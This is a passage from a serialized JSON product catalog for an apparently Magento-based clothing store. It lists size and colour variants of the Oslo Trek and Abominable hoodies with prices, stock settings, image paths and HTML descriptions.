wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"oslo-trek-hoodie-xl-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh08-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh08-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh08-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh08-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh08-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Purple\"},\"126\":{\"sku\":\"MH08-XL-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Oslo Trek Hoodie-XL-Red\",\"description\":\"<p>Chilly weather is just an excuse to throw on your toasty, handsome new Oslo Trek Hoodie. It features an adjustable drawstring hood and a kangaroo pocket for extra hand warmth. The ultra-soft, cozy lining will have you wishing for more brisk days.<\\/p>\\n<p>&bull; Brown hoodie with black detail.<br \\/>&bull; Pullover. <br \\/>&bull; Adjustable drawstring hood. <br \\/>&bull; Ribbed cuffs\\/waistband. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"oslo-trek-hoodie-xl-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh08-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh08-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh08-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh08-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh08-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Red\"},\"127\":{\"sku\":\"MH08\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Oslo Trek Hoodie\",\"description\":\"<p>Chilly weather is just an excuse to throw on your toasty, handsome new Oslo Trek Hoodie. It features an adjustable drawstring hood and a kangaroo pocket for extra hand warmth. The ultra-soft, cozy lining will have you wishing for more brisk days.<\\/p>\\n<p>&bull; Brown hoodie with black detail.<br \\/>&bull; Pullover. <br \\/>&bull; Adjustable drawstring hood. <br \\/>&bull; Ribbed cuffs\\/waistband. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh08-brown_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh08-brown_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh08-brown_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,material=Organic Cotton|Polyester|Nylon,pattern=Solid,climate=Windy|Cool,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MH08-XS-Brown,size=XS,color=Brown|sku=MH08-XS-Purple,size=XS,color=Purple|sku=MH08-XS-Red,size=XS,color=Red|sku=MH08-S-Brown,size=S,color=Brown|sku=MH08-S-Purple,size=S,color=Purple|sku=MH08-S-Red,size=S,color=Red|sku=MH08-M-Brown,size=M,color=Brown|sku=MH08-M-Purple,size=M,color=Purple|sku=MH08-M-Red,size=M,color=Red|sku=MH08-L-Brown,size=L,color=Brown|sku=MH08-L-Purple,size=L,color=Purple|sku=MH08-L-Red,size=L,color=Red|sku=MH08-XL-Brown,size=XL,color=Brown|sku=MH08-XL-Purple,size=XL,color=Purple|sku=MH08-XL-Red,size=XL,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh08-brown_alt1.jpg,\\/m\\/h\\/mh08-brown_back.jpg\",\"image\":\"\\/m\\/h\\/mh08-brown_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh08-brown_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh08-brown_alt1.jpg,\\/m\\/h\\/mh08-brown_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"material\":\"Organic Cotton|Polyester|Nylon\",\"pattern\":\"Solid\",\"climate\":\"Windy|Cool\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"128\":{\"sku\":\"MH09-XS-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Abominable Hoodie-XS-Blue\",\"description\":\"<p>It took CoolTech&trade; weather apparel know-how and lots of wind-resistant fabric to get the Abominable Hoodie just right. It\'s aggressively warm when it needs to be, while maintaining your comfort in milder climes.<\\/p>\\n<p>&bull; Blue heather hoodie.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Moisture-wicking. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"abominable-hoodie-xs-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh09-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh09-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh09-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh09-blue_alt1.jpg,\\/m\\/h\\/mh09-blue_back.jpg\",\"image\":\"\\/m\\/h\\/mh09-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh09-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh09-blue_alt1.jpg,\\/m\\/h\\/mh09-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Blue\"},\"129\":{\"sku\":\"MH09-XS-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Abominable Hoodie-XS-Green\",\"description\":\"<p>It took CoolTech&trade; weather apparel know-how and lots of wind-resistant fabric to get the Abominable Hoodie just right. It\'s aggressively warm when it needs to be, while maintaining your comfort in milder climes.<\\/p>\\n<p>&bull; Blue heather hoodie.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Moisture-wicking. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"abominable-hoodie-xs-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh09-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh09-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh09-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh09-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh09-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Green\"},\"130\":{\"sku\":\"MH09-XS-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Abominable Hoodie-XS-Red\",\"description\":\"<p>It took CoolTech&trade; weather apparel know-how and lots of wind-resistant fabric to get the Abominable Hoodie just right. It\'s aggressively warm when it needs to be, while maintaining your comfort in milder climes.<\\/p>\\n<p>&bull; Blue heather hoodie.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Moisture-wicking. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"abominable-hoodie-xs-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh09-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh09-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh09-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh09-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh09-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Red\"},\"131\":{\"sku\":\"MH09-S-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Abominable Hoodie-S-Blue\",\"description\":\"<p>It took CoolTech&trade; weather apparel know-how and lots of wind-resistant fabric to get the Abominable Hoodie just right. It\'s aggressively warm when it needs to be, while maintaining your comfort in milder climes.<\\/p>\\n<p>&bull; Blue heather hoodie.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Moisture-wicking. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"abominable-hoodie-s-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh09-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh09-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh09-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh09-blue_alt1.jpg,\\/m\\/h\\/mh09-blue_back.jpg\",\"image\":\"\\/m\\/h\\/mh09-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh09-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh09-blue_alt1.jpg,\\/m\\/h\\/mh09-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Blue\"},\"132\":{\"sku\":\"MH09-S-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Abominable Hoodie-S-Green\",\"description\":\"<p>It took CoolTech&trade; weather apparel know-how and lots of wind-resistant fabric to get the Abominable Hoodie just right. It\'s aggressively warm when it needs to be, while maintaining your comfort in milder climes.<\\/p>\\n<p>&bull; Blue heather hoodie.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Moisture-wicking. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"abominable-hoodie-s-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh09-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh09-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh09-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh09-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh09-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Green\"},\"133\":{\"sku\":\"MH09-S-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Abominable Hoodie-S-Red\",\"description\":\"<p>It took CoolTech&trade; weather apparel know-how and lots of wind-resistant fabric to get the Abominable Hoodie just right. It\'s aggressively warm when it needs to be, while maintaining your comfort in milder climes.<\\/p>\\n<p>&bull; Blue heather hoodie.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Moisture-wicking. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"abominable-hoodie-s-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh09-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh09-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh09-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh09-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh09-red_main.jpg\